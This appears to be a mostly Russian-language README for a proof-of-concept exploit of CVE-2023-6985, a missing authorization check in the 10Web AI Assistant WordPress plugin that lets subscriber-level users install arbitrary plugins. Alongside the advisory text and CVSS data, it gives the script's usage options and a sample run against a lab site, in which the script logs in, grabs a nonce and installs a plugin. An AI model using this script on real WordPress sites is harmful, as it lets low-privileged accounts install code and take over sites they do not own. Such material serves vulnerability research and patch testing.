
10Web AI Assistant – AI-помощник по написанию контента <= 1.0.18 - Отсутствие авторизации для аутентифицированных (Подписчик+) Произвольная установка/активация плагинов Описание
10Web AI Assistant – AI content writing assistant <= 1.0.18 - Отсутствие проверки прав доступа для установки/активации произвольных плагинов (требуется подписчик+)
Плагин 10Web AI Assistant – AI content writing assistant для WordPress уязвим к несанкционированному изменению данных из-за отсутствия проверки прав доступа в AJAX-действии install_plugin во всех версиях до 1.0.18 включительно. Это позволяет аутентифицированным злоумышленникам с уровнем доступа не ниже подписчика устанавливать произвольные плагины, которые могут быть использованы для получения дальнейшего доступа к скомпрометированному сайту.
Severity: medium
CVE ID: CVE-2023-6985
CVSS Score: 6.5
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Plugin Slug: ai-assistant-by-10web
WPScan URL: https://www.wpscan.com/plugin/ai-assistant-by-10web
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/229245a5-468d-47b9-8f26-d23d593e91da
Diff URL: https://plugins.trac.wordpress.org/changeset/3027004/ai-assistant-by-10web/trunk/ai-assistant-by-10web.php
Download Vuln: https://downloads.wordpress.org/plugin/ai-assistant-by-10web.1.0.18.zip
python3 CVE-2023-6985.py -h
usage: CVE-2023-6985.py [-h] --url URL --username USERNAME --password PASSWORD --slug SLUG --php PHP
10Web AI Assistant – AI content writing assistant <= 1.0.18 - Отсутствие проверки прав доступа для установки/активации произвольных плагинов (требуется подписчик+) CVE-2023-6985 - Плагин 10Web AI Assistant – AI
content writing assistant для WordPress уязвим к несанкционированному изменению данных из-за отсутствия проверки прав доступа в AJAX-действии install_plugin во всех версиях до 1.0.18 включительно.
Это позволяет аутентифицированным злоумышленникам с уровнем доступа не ниже подписчика устанавливать произвольные плагины, которые могут быть использованы для получения дальнейшего доступа к скомпрометированному сайту.
options:
-h, --help показать это справочное сообщение и выйти
--url URL URL сайта WordPress
--username USERNAME имя пользователя WordPress
--password PASSWORD пароль WordPress
--slug SLUG ярлык плагина WordPress
--php PHP PHP-файл плагина WordPress
python3 CVE-2023-6985.py --url http://wordpress.lan --username user --password useruser1 --slug display-php-version --php display-php-version.php
Logged in successfully.
Getting REST API Nonce!
Nonce Found: df8390ff4b
Installing Plugin
Downloading installation package from https://downloads.wordpress.org/plugin/display-php-version.latest-stable.zip
Unpacking the package
Installing the plugin
Plugin installed successfully.
{"success":true}